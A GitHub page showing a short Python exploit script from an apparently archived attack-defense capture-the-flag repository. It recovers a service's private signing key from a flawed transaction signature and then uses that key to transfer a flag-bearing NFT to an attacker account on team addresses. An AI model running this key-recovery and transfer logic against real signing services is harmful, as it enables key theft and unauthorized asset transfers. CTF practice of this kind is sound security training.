This repository has been archived by the owner on May 25, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 8
/
service1-store2-vuln2-keyrecovery.py
executable file
·94 lines (76 loc) · 2.13 KB
/
service1-store2-vuln2-keyrecovery.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/env python3
import sys
from hashlib import sha256
from Crypto.Util.number import inverse
from service1_common import *
def modular_sqrt(a, p):
def legendre_symbol(a, p):
ls = pow(a, (p - 1) // 2, p)
return -1 if ls == p - 1 else ls
if legendre_symbol(a, p) != 1:
return 0
elif a == 0:
return 0
elif p == 2:
return p
elif p % 4 == 3:
return pow(a, (p + 1) // 4, p)
s = p - 1
e = 0
while s % 2 == 0:
s //= 2
e += 1
n = 2
while legendre_symbol(n, p) != -1:
n += 1
x = pow(a, (s + 1) // 2, p)
b = pow(a, s, p)
g = pow(n, s, p)
r = e
while True:
t = b
m = 0
for m in range(r):
if t == 1:
break
t = pow(t, 2, p)
if m == 0:
return x
gs = pow(g, 2 ** (r - m - 1), p)
g = (gs * gs) % p
x = (x * gs) % p
b = (b * g) % p
r = m
def compute_key(h, r, s):
q = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
delta = r*r+4*h*h*s
sd = modular_sqrt(delta, q)
iden = inverse(2*s*h, q)
return ((r+sd)*iden) % q, ((r-sd)*iden) % q
def exploit(ip, flag_id):
u1, p1 = randstr(10), randstr(10)
c = Client(ip, u1, p1)
resp = c.view_nft(flag_id)
user_id = re.search('/user/(.*?)"', resp.text)[1]
res = c.get_transactions_user(user_id)
# c.close()
trans = res[0]
blob = blob = f"{{\"nft_id\":\"{trans['nft_id']}\",\"user_id\":\"{trans['to_user']}\"}}"
sig = trans["signature"]
r, s = int(sig[:64], 16), int(sig[64:], 16)
h = int(sha256(blob.encode()).hexdigest(), 16)
x1, x2 = compute_key(h, r, s)
for x in [x1, x2]:
key = Key(x)
u2, p2 = randstr(10), randstr(10)
c2 = Client(ip, u2, p2, key)
my_id = c2.register_user()
resp = c2.donate_nft(flag_id, user_id, my_id)
# c2.close()
return "\n".join(find_flag(resp.text))
return None
if __name__ == "__main__":
team_id = sys.argv[1]
flag_id = sys.argv[2]
ip = f"10.60.{team_id}.1"
print(exploit(ip, flag_id))